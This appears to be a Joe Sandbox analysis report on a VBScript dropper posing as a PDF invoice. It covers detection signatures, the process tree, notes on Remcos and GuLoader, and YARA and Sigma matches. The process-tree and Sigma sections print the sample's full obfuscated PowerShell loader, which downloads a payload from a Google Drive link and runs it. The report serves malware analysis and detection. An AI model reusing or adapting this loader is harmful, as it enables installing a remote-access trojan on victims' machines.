Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs

Overview

General Information

Sample name:FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs
renamed because original name is a hash value
Original sample name:FAKTURA-P-4526485-2742747722-00043067pdf.vbs
Analysis ID:1636426
MD5:bcc3425d021c26a5baf855502b0c609b
SHA1:0b01002803b807210127366afe4c9abff1fd62da
SHA256:6a2f42008025068bd6943e90e73f473de802e86f6fc5b33cc5958a5e28f9ec56
Tags:vbsuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 3940 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 6408 cmdline: ping Host_6637.6637.6637.657e MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6648 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Postejens; function Subrogate($plankevrks){$Brandfare=4;do{$Hindbrmarmeladers+=$plankevrks[$Brandfare];$Brandfare+=5;$Superfunction=Format-List} until(!$plankevrks[$Brandfare])$Hindbrmarmeladers}function Elektriseringers($Spegeskinkens){ .($Majestternes) ($Spegeskinkens)}$Staahjder211=Subrogate 'solfnFornETroutBech. samW';$Staahjder211+=Subrogate 'Unove ForByewsC entLUninIMeriETrauNOrgaT';$Datafil79=Subrogate 'EngiM TiloDe,azhac i a,vlhag,l oma.rdi/';$fireetageshusenes=Subrogate 'FermT Deslent sSpec1Cond2';$Valutasats='Viab[Farrn.nine Tl T V n.TvisS Plae T.tRcin VTalli ndiCBeslePsykPSto oCaprILechNA.sltD riM K maSpirNUnclaMel g.dseeBrudrS,ov]Evan:Comm:strasprece Diac A tU disR BekiForsT Fo,y IntPIdeaRSlipoFlytTRhodoLedeC B.oo FejLAn u= ndh$UdlifLiteIfi.kr Da E Tr,E UndtM ewAS arGlat E uels erqhDydsuTilsSShreeLevenStevEEspis';$Datafil79+=Subrogate 'Klan5B ll. Und0Ri g Af (rystWRegniG ienAvand tomo edewmalps Noa OverNGaliTBade Fora1 Lym0Ne f.Afkr0mong;Eris Cel WInq i FalnKuns6T yr4At,a;Trst S edx Bol6M ll4Udsk; Bu LaskrAfmnvLo g: Opg1 Sph3 Non4D ed.Befr0Ril,)Nabo Ind,GUba,eRaimcProskAgraokomf/ Age2 Std0Lode1Ta.e0 Beg0Valu1 nsa0 Ber1Fl l E oxFKa.aiBo,irXenoePe afMarkoBasixPou / Pha1Sa.t3Fib 4For,.Fron0';$Archery=Subrogate 'ton,UReciSAd leRechR alg-SnakaP,ecGHeroEVenenclert';$Reask=Subrogate 'MinihA sktMetatKontpPrefs Una:Trof/Irid/U,kadSuprrScomiA ervKompeTilf.BrangGuldoSkudoBal.g E,blAlg e dis.UnilcHalvo L tmsiff/circuRetrc Elf?KrydeIm.oxBebopti soB nzr BovtSfin=LabsdFlodo IrrwBillnWi dl Tilo VagaI oad ndl&FutuiH tbdefte=felt1 wa6Sup sDoomnbaksvIfre_,asm9 org5Nonnwglds0akvan .icE.usy4 pigL HerR AntQSubiiRamifNatubAlekdKrelrHrgeSb.sahServuAdinJMahjPChi.1 ,neXHubmqZarev FidVKnleyB.dvR';$Brandfarempolder=Subrogate 'Ster>';$Majestternes=Subrogate ' caI,apeeAnimx';$Pyroman='Myope';$Frontalitetens='\Fugtservietter.Her';Elektriseringers (Subrogate 'Stig$ illgstill,azzOMesoBTrllAOhmal S.a: umsNeigTDemoy SuirFor IBargnAnteG UbeSP hlaSubsF arsdcitiEf.sklAngaIShanNIndrg C aERigen,quisskan=Begn$Fa oeOx dNPalaVChiv:KommaThysPFlopp undDMacrABirgTPhonaNonr+Lned$AmfefantoRSuppo GhanSke tKr.gaoutsl ejrI nretMicrEPap t.eske da NSt ds');Elektriseringers (Subrogate 'Vild$HusmGTrinlVinroTherbGabbAAraulE it:EfteAOmorSS ffPIndtH SpdAFedeL Rest ReteLapaRW,id=Pe c$ReforLoxoe .onAAnsvs gnaK on.SoloSHamrpChaslF geitusktTing(P.od$UnquB emorP esA Ax NR kodbre FPostaFibrr SekE TjeMLydlpLyssoKre L EthDSwarebu tR on)');Elektriseringers (Subrogate $Valutasats);$Reask=$Asphalter[0];$Fremgangsperiodernes=(Subrogate 'Taar$ XpagFunklsawmO bu.bGeo a,ahoL run:etagAFreiTKogeH flnE croOPrekLWraiOprokg SanYSt,k= dsND odEIndtwInem- UneOSkr BauntJ ,ineFingcAnfrtCand lluSPompYStenSMartTDiskEDa,dmUnun.Peri$Hamms AfgtTr la PorAUndeHLangJDde dHeweEJunerF.es2Munt1 Ent1');Elektriseringers ($Fremgangsperiodernes);Elektriseringers (Subrogate ' Opl$ FinACo,otSalahbedye B,coM telSkkeoRig gupl yMaso.huldHLateeAfchaCoutd UndeMatrrDia sMira[Dece$SateAPrebr padcBr ghS ikeTranrpokayBown] k a=Ttyf$IndeD .psaUnsctBgeraPrudfPan i.amalStan7,orp9');$Thermoses=Subrogate 'pa t$PrelAModit Ve hNosteForloDimelEct oElitgSygeyStue.StteDSandoGte wSpannMonolSikkoFolkaAdmidFi iF O eiNyphlsyfieStor(Ditt$ totR SameCompaSejosOutpkPort,Bdg,$ urG TeglBaa.oBur,zFor eGibbsSint)';$Glozes=$Styringsafdelingens;Elektriseringers (Subrogate 'Subt$DalegUnculGin,OPo oBAfleaRed.lRewa:SolldVe,iI IndmQuizEFjeltAmnehGadgY ettL.rykbR veEMag nUdd Z cieBeren NyleNick=,adn( dittPatreFritsJgertDiap-VandPDespaBeritCillH dvi In $Jvn.gKum LDisco ronzTatteAnssSSted)');while (!$Dimethylbenzene) {Elektriseringers (Subrogate 'S um$ Lr gUnlilNon.o S obFr.earefelMile:UnprFMonooArtirMorrc MeniCatep KaciNonfaMagllBrat=Dren$Re sn SysoConjni bjiReinn middzi buStrks BintApprrRadiiBr.gaCalclpr.gi.ienzPreee Hydd') ;Elektriseringers $Thermoses;Elektriseringers (Subrogate 'Frsl[ ChoTSidehPlasRP,ssEcrueaAd idOdalI FinnSeerGPleu.D ciTAccehObexrDip.EAu iaBru D Spn]Tamp:Maza: ApoSSatcl Bede A,seNu,epPedi(Eksp4Iskl0Pe v0Hard0prec)');Elektriseringers (Subrogate 'Mi.d$ QuigAr nlDirio Skrb Pela FoulUnde:SuppDParaiQuatmAthieJin TPa rhTranyBarklbuncbHundEAmp.N .etz orEKe,inToadESubc=Over( RedTUnfaEt.inSBrgetByra-LogrPTetrASemiT Neuh egt Sco$Forsg TidlCestOFremZRehae Da SGass)') ;Elektriseringers (Subrogate 'Cook$NoneGGrntL,onpoVentbspecaDisclUdgy: Udgk,agtv atrIHem nAreoD.verE dmi= Ele$OrthGAramLRealob,haBP ocaKlasL Amn: cirr andASt vVSavnNUgeniFarmnLevngU.dy+Forr+Auto%Side$SlikaGau sDienpZygoh bagAFabrLN.utTS ksEtalerPoss.Tr sC Lu o PopUtungNUnsot') ;$Reask=$Asphalter[$kvinde]}$Belemringen=344979;$Altsaxer=31350;Elektriseringers (Subrogate ' .id$ A tGForsL D pOPhotBDe.gAForsl E o: Kont NedHU,reiS droUnnuR labEUdtrsTh,aOTo,prEuphc J aI DetNUndeO UnfLAcet Rege=Gran SupeGPante traTUddi-Tro cB owO hjen Ko,tKnale edeNudpoT Sal ,hii$Li egMetalLektO edfZUnprETin S');Elektriseringers (Subrogate 'drue$Uefag Legl Mi oLafgbFo ka InhlWhis:SentEi dokWoodsMentpPlaseDetndOegei Ov t Jugr usteBanenStansEiv Fjsi= rea L ve[ParaSG atySammsFirpt rste Trum Wat.Sh.dC KogoTuranSurvvUnsieHestr Su t Rot]Slip:Unre:TabaFLyserhaemo.ogemPrenB ,oraUnivsMenoeSkuf6Vans4U spSOttetparcrFulniM ssnDes gc,ll(Pree$MinoTSalmhSyntiFal oLater P.leKorasVillo DunrWin cAzt,iUnnena looNed lDyre)');Elektriseringers (Subrogate ' Fus$Ung g KulLHalvOG,beb SkjASemtLOpre:Zo gk UnsV Mg i BagvIn eaSmalLPe.iE ompRIncrEIndrsPerj Coun=S yr Tap [PolysTentyHitssThretFedtE D iM spe. KomtAutoEUnexx Ur.TLary.C,roeAgnoNGeomCRaaboBangdIn iibistnUdl gBr k] Int:Bis,:EloxaprskS,osec boniSe eI Reh.Armeg Bl E,ydbt ClaSNympTEpicrAdv iIdioN unnG Me ( s.n$ ksE.plakPionsU.eepJuleE B.uDMa uIDukstKambRS,areBlteN ors L,e)');Elektriseringers (Subrogate ' W.n$HjemG InvLE seoRehob Un AHilsL Kik:fleaoGe aLP eiFSacrENgstr HilT UtrS San= Mo $Pun K IntV.issi KrlvSputAPeraLHilleIndeRAss,EFo.ss til.b nbSRefoUConsBfasts raT frsrSvumICephNphenG Fis(P.rr$D spBAvisE nelGloeEMycemDataRGe tiO poNforsgOrthETelenLeds,lysk$.ortaBorgLF skTAntisDeonAVentXgoa E NonR U.h)');Elektriseringers $Olferts;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 5980 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • powershell.exe (PID: 1232 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Postejens; function Subrogate($plankevrks){$Brandfare=4;do{$Hindbrmarmeladers+=$plankevrks[$Brandfare];$Brandfare+=5;$Superfunction=Format-List} until(!$plankevrks[$Brandfare])$Hindbrmarmeladers}function Elektriseringers($Spegeskinkens){ .($Majestternes) ($Spegeskinkens)}$Staahjder211=Subrogate 'solfnFornETroutBech. samW';$Staahjder211+=Subrogate 'Unove ForByewsC entLUninIMeriETrauNOrgaT';$Datafil79=Subrogate 'EngiM TiloDe,azhac i a,vlhag,l oma.rdi/';$fireetageshusenes=Subrogate 'FermT Deslent sSpec1Cond2';$Valutasats='Viab[Farrn.nine Tl T V n.TvisS Plae T.tRcin VTalli ndiCBeslePsykPSto oCaprILechNA.sltD riM K maSpirNUnclaMel g.dseeBrudrS,ov]Evan:Comm:strasprece Diac A tU disR BekiForsT Fo,y IntPIdeaRSlipoFlytTRhodoLedeC B.oo FejLAn u= ndh$UdlifLiteIfi.kr Da E Tr,E UndtM ewAS arGlat E uels erqhDydsuTilsSShreeLevenStevEEspis';$Datafil79+=Subrogate 'Klan5B ll. Und0Ri g Af (rystWRegniG ienAvand tomo edewmalps Noa OverNGaliTBade Fora1 Lym0Ne f.Afkr0mong;Eris Cel WInq i FalnKuns6T yr4At,a;Trst S edx Bol6M ll4Udsk; Bu LaskrAfmnvLo g: Opg1 Sph3 Non4D ed.Befr0Ril,)Nabo Ind,GUba,eRaimcProskAgraokomf/ Age2 Std0Lode1Ta.e0 Beg0Valu1 nsa0 Ber1Fl l E oxFKa.aiBo,irXenoePe afMarkoBasixPou / Pha1Sa.t3Fib 4For,.Fron0';$Archery=Subrogate 'ton,UReciSAd leRechR alg-SnakaP,ecGHeroEVenenclert';$Reask=Subrogate 'MinihA sktMetatKontpPrefs Una:Trof/Irid/U,kadSuprrScomiA ervKompeTilf.BrangGuldoSkudoBal.g E,blAlg e dis.UnilcHalvo L tmsiff/circuRetrc Elf?KrydeIm.oxBebopti soB nzr BovtSfin=LabsdFlodo IrrwBillnWi dl Tilo VagaI oad ndl&FutuiH tbdefte=felt1 wa6Sup sDoomnbaksvIfre_,asm9 org5Nonnwglds0akvan .icE.usy4 pigL HerR AntQSubiiRamifNatubAlekdKrelrHrgeSb.sahServuAdinJMahjPChi.1 ,neXHubmqZarev FidVKnleyB.dvR';$Brandfarempolder=Subrogate 'Ster>';$Majestternes=Subrogate ' caI,apeeAnimx';$Pyroman='Myope';$Frontalitetens='\Fugtservietter.Her';Elektriseringers (Subrogate 'Stig$ illgstill,azzOMesoBTrllAOhmal S.a: umsNeigTDemoy SuirFor IBargnAnteG UbeSP hlaSubsF arsdcitiEf.sklAngaIShanNIndrg C aERigen,quisskan=Begn$Fa oeOx dNPalaVChiv:KommaThysPFlopp undDMacrABirgTPhonaNonr+Lned$AmfefantoRSuppo GhanSke tKr.gaoutsl ejrI nretMicrEPap t.eske da NSt ds');Elektriseringers (Subrogate 'Vild$HusmGTrinlVinroTherbGabbAAraulE it:EfteAOmorSS ffPIndtH SpdAFedeL Rest ReteLapaRW,id=Pe c$ReforLoxoe .onAAnsvs gnaK on.SoloSHamrpChaslF geitusktTing(P.od$UnquB emorP esA Ax NR kodbre FPostaFibrr SekE TjeMLydlpLyssoKre L EthDSwarebu tR on)');Elektriseringers (Subrogate $Valutasats);$Reask=$Asphalter[0];$Fremgangsperiodernes=(Subrogate 'Taar$ XpagFunklsawmO bu.bGeo a,ahoL run:etagAFreiTKogeH flnE croOPrekLWraiOprokg SanYSt,k= dsND odEIndtwInem- UneOSkr BauntJ ,ineFingcAnfrtCand lluSPompYStenSMartTDiskEDa,dmUnun.Peri$Hamms AfgtTr la PorAUndeHLangJDde dHeweEJunerF.es2Munt1 Ent1');Elektriseringers ($Fremgangsperiodernes);Elektriseringers (Subrogate ' Opl$ FinACo,otSalahbedye B,coM telSkkeoRig gupl yMaso.huldHLateeAfchaCoutd UndeMatrrDia sMira[Dece$SateAPrebr padcBr ghS ikeTranrpokayBown] k a=Ttyf$IndeD .psaUnsctBgeraPrudfPan i.amalStan7,orp9');$Thermoses=Subrogate 'pa t$PrelAModit Ve hNosteForloDimelEct oElitgSygeyStue.StteDSandoGte wSpannMonolSikkoFolkaAdmidFi iF O eiNyphlsyfieStor(Ditt$ totR SameCompaSejosOutpkPort,Bdg,$ urG TeglBaa.oBur,zFor eGibbsSint)';$Glozes=$Styringsafdelingens;Elektriseringers (Subrogate 'Subt$DalegUnculGin,OPo oBAfleaRed.lRewa:SolldVe,iI IndmQuizEFjeltAmnehGadgY ettL.rykbR veEMag nUdd Z cieBeren NyleNick=,adn( dittPatreFritsJgertDiap-VandPDespaBeritCillH dvi In $Jvn.gKum LDisco ronzTatteAnssSSted)');while (!$Dimethylbenzene) {Elektriseringers (Subrogate 'S um$ Lr gUnlilNon.o S obFr.earefelMile:UnprFMonooArtirMorrc MeniCatep KaciNonfaMagllBrat=Dren$Re sn SysoConjni bjiReinn middzi buStrks BintApprrRadiiBr.gaCalclpr.gi.ienzPreee Hydd') ;Elektriseringers $Thermoses;Elektriseringers (Subrogate 'Frsl[ ChoTSidehPlasRP,ssEcrueaAd idOdalI FinnSeerGPleu.D ciTAccehObexrDip.EAu iaBru D Spn]Tamp:Maza: ApoSSatcl Bede A,seNu,epPedi(Eksp4Iskl0Pe v0Hard0prec)');Elektriseringers (Subrogate 'Mi.d$ QuigAr nlDirio Skrb Pela FoulUnde:SuppDParaiQuatmAthieJin TPa rhTranyBarklbuncbHundEAmp.N .etz orEKe,inToadESubc=Over( RedTUnfaEt.inSBrgetByra-LogrPTetrASemiT Neuh egt Sco$Forsg TidlCestOFremZRehae Da SGass)') ;Elektriseringers (Subrogate 'Cook$NoneGGrntL,onpoVentbspecaDisclUdgy: Udgk,agtv atrIHem nAreoD.verE dmi= Ele$OrthGAramLRealob,haBP ocaKlasL Amn: cirr andASt vVSavnNUgeniFarmnLevngU.dy+Forr+Auto%Side$SlikaGau sDienpZygoh bagAFabrLN.utTS ksEtalerPoss.Tr sC Lu o PopUtungNUnsot') ;$Reask=$Asphalter[$kvinde]}$Belemringen=344979;$Altsaxer=31350;Elektriseringers (Subrogate ' .id$ A tGForsL D pOPhotBDe.gAForsl E o: Kont NedHU,reiS droUnnuR labEUdtrsTh,aOTo,prEuphc J aI DetNUndeO UnfLAcet Rege=Gran SupeGPante traTUddi-Tro cB owO hjen Ko,tKnale edeNudpoT Sal ,hii$Li egMetalLektO edfZUnprETin S');Elektriseringers (Subrogate 'drue$Uefag Legl Mi oLafgbFo ka InhlWhis:SentEi dokWoodsMentpPlaseDetndOegei Ov t Jugr usteBanenStansEiv Fjsi= rea L ve[ParaSG atySammsFirpt rste Trum Wat.Sh.dC KogoTuranSurvvUnsieHestr Su t Rot]Slip:Unre:TabaFLyserhaemo.ogemPrenB ,oraUnivsMenoeSkuf6Vans4U spSOttetparcrFulniM ssnDes gc,ll(Pree$MinoTSalmhSyntiFal oLater P.leKorasVillo DunrWin cAzt,iUnnena looNed lDyre)');Elektriseringers (Subrogate ' Fus$Ung g KulLHalvOG,beb SkjASemtLOpre:Zo gk UnsV Mg i BagvIn eaSmalLPe.iE ompRIncrEIndrsPerj Coun=S yr Tap [PolysTentyHitssThretFedtE D iM spe. KomtAutoEUnexx Ur.TLary.C,roeAgnoNGeomCRaaboBangdIn iibistnUdl gBr k] Int:Bis,:EloxaprskS,osec boniSe eI Reh.Armeg Bl E,ydbt ClaSNympTEpicrAdv iIdioN unnG Me ( s.n$ ksE.plakPionsU.eepJuleE B.uDMa uIDukstKambRS,areBlteN ors L,e)');Elektriseringers (Subrogate ' W.n$HjemG InvLE seoRehob Un AHilsL Kik:fleaoGe aLP eiFSacrENgstr HilT UtrS San= Mo $Pun K IntV.issi KrlvSputAPeraLHilleIndeRAss,EFo.ss til.b nbSRefoUConsBfasts raT frsrSvumICephNphenG Fis(P.rr$D spBAvisE nelGloeEMycemDataRGe tiO poNforsgOrthETelenLeds,lysk$.ortaBorgLF skTAntisDeonAVentXgoa E NonR U.h)');Elektriseringers $Olferts;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 4680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 1100 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 2880 cmdline: "C:\Windows\System32\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.1882393823.00000000085B0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    0000000F.00000002.2197846460.000000000A662000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000004.00000002.1401976050.000002A9C69D6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        0000000D.00000002.1867994553.0000000005785000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          0000000D.00000002.1882574423.000000000B684000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 4 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_6648.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi64_6648.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xfc8d:$b2: ::FromBase64String(
              • 0xd012:$s1: -join
              • 0x67be:$s4: +=
              • 0x6880:$s4: +=
              • 0xaaa7:$s4: +=
              • 0xcbc4:$s4: +=
              • 0xceae:$s4: +=
              • 0xcff4:$s4: +=
              • 0xf391:$s4: +=
              • 0xf411:$s4: +=
              • 0xf4d7:$s4: +=
              • 0xf557:$s4: +=
              • 0xf72d:$s4: +=
              • 0xf7b1:$s4: +=
              • 0xd82b:$e4: Get-WmiObject
              • 0xda1a:$e4: Get-Process
              • 0xda72:$e4: Start-Process
              amsi32_1232.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xa81f:$b2: ::FromBase64String(
              • 0x98aa:$s1: -join
              • 0x3056:$s4: +=
              • 0x3118:$s4: +=
              • 0x733f:$s4: +=
              • 0x945c:$s4: +=
              • 0x9746:$s4: +=
              • 0x988c:$s4: +=
              • 0x13c6a:$s4: +=
              • 0x13cea:$s4: +=
              • 0x13db0:$s4: +=
              • 0x13e30:$s4: +=
              • 0x14006:$s4: +=
              • 0x1408a:$s4: +=
              • 0xa0c3:$e4: Get-WmiObject
              • 0xa2b2:$e4: Get-Process
              • 0xa30a:$e4: Start-Process
              • 0x148ed:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs", ProcessId: 3940, ProcessName: wscript.exe
              Sigma detected: Msiexec Initiated Connection
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 216.58.206.46, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1100, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49696
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs", ProcessId: 3940, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Postejens; function Subrogate($plankevrks){$Brandfare=4;do{$Hindbrmarmeladers+=$plankevrks[$Brandfare];$Brandfare+=5;$Superfunction=Format-List} until(!$plankevrks[$Brandfare])$Hindbrmarmeladers}function Elektriseringers($Spegeskinkens){ .($Majestternes) ($Spegeskinkens)}$Staahjder211=Subrogate 'solfnFornETroutBech. samW';$Staahjder211+=Subrogate 'Unove ForByewsC entLUninIMeriETrauNOrgaT';$Datafil79=Subrogate 'EngiM TiloDe,azhac i a,vlhag,l oma.rdi/';$fireetageshusenes=Subrogate 'FermT Deslent sSpec1Cond2';$Valutasats='Viab[Farrn.nine Tl T V n.TvisS Plae T.tRcin VTalli ndiCBeslePsykPSto oCaprILechNA.sltD riM K maSpirNUnclaMel g.dseeBrudrS,ov]Evan:Comm:strasprece Diac A tU disR BekiForsT Fo,y IntPIdeaRSlipoFlytTRhodoLedeC B.oo FejLAn u= ndh$UdlifLiteIfi.kr Da E Tr,E UndtM ewAS arGlat E uels erqhDydsuTilsSShreeLevenStevEEspis';$Datafil79+=Subrogate 'Klan5B ll. Und0Ri g Af (rystWRegniG ienAvand tomo edewmalps Noa OverNGaliTBade Fora1 Lym0Ne f.Afkr0mong;Eris Cel WInq i FalnKuns6T yr4At,a;Trst S edx Bol6M ll4Udsk; Bu LaskrAfmnvLo g: Opg1 Sph3 Non4D ed.Befr0Ril,)Nabo Ind,GUba,eRaimcProskAgraokomf/ Age2 Std0Lode1Ta.e0 Beg0Valu1 nsa0 Ber1Fl l E oxFKa.aiBo,irXenoePe afMarkoBasixPou / Pha1Sa.t3Fib 4For,.Fron0';$Archery=Subrogate 'ton,UReciSAd leRechR alg-SnakaP,ecGHeroEVenenclert';$Reask=Subrogate 'MinihA sktMetatKontpPrefs Una:Trof/Irid/U,kadSuprrScomiA ervKompeTilf.BrangGuldoSkudoBal.g E,blAlg e dis.UnilcHalvo L tmsiff/circuRetrc Elf?KrydeIm.oxBebopti soB nzr BovtSfin=LabsdFlodo IrrwBillnWi dl Tilo VagaI oad ndl&FutuiH tbdefte=felt1 wa6Sup sDoomnbaksvIfre_,asm9 org5Nonnwglds0akvan .icE.usy4 pigL HerR AntQSubiiRamifNatubAlekdKrelrHrgeSb.sahServuAdinJMahjPChi.1 ,neXHubmqZarev FidVKnleyB.dvR';$Brandfarempolder=Subrogate 'Ster>';$Majestternes=Subrogate ' caI,apeeAnimx';$Pyroman='Myope';$Frontalitetens='\Fugtservietter.Her';Elektriseringers (Subrogate 'Stig$ illgstill,azzOMesoBTrllAOhmal S.a: umsNeigTDemoy SuirFor IBargnAnteG UbeSP hlaSubsF arsdcitiEf.sklAngaIShanNIndrg C aERigen,quisskan=Begn$Fa oeOx dNPalaVChiv:KommaThysPFlopp undDMacrABirgTPhonaNonr+Lned$AmfefantoRSuppo GhanSke tKr.gaoutsl ejrI nretMicrEPap t.eske da NSt ds');Elektriseringers (Subrogate 'Vild$HusmGTrinlVinroTherbGabbAAraulE it:EfteAOmorSS ffPIndtH SpdAFedeL Rest ReteLapaRW,id=Pe c$ReforLoxoe .onAAnsvs gnaK on.SoloSHamrpChaslF geitusktTing(P.od$UnquB emorP esA Ax NR kodbre FPostaFibrr SekE TjeMLydlpLyssoKre L EthDSwarebu tR on)');Elektriseringers (Subrogate $Valutasats);$Reask=$Asphalter[0];$Fremgangsperiodernes=(Subrogate 'Taar$ XpagFunklsawmO bu.bGeo a,ahoL run:etagAFreiTKogeH flnE croOPrekLWraiOprokg SanYSt,k= dsND odEIndtwInem- UneOSkr BauntJ ,ineFingcAnfrtCand lluSPompYStenSMartTDiskEDa,dmUnun.Peri$Hamms AfgtTr la PorAUndeHLangJDde dHeweEJunerF.es2Munt1 Ent1');Elektriseringers ($Fremgangsperiodernes);Elektriseringers (Subrogate ' Opl$ FinACo,otSalahbedye B,coM telSkkeoRig gupl yMaso.huldHLateeAfchaCoutd U
              Sigma detected: Windows Processes Suspicious Parent Directory
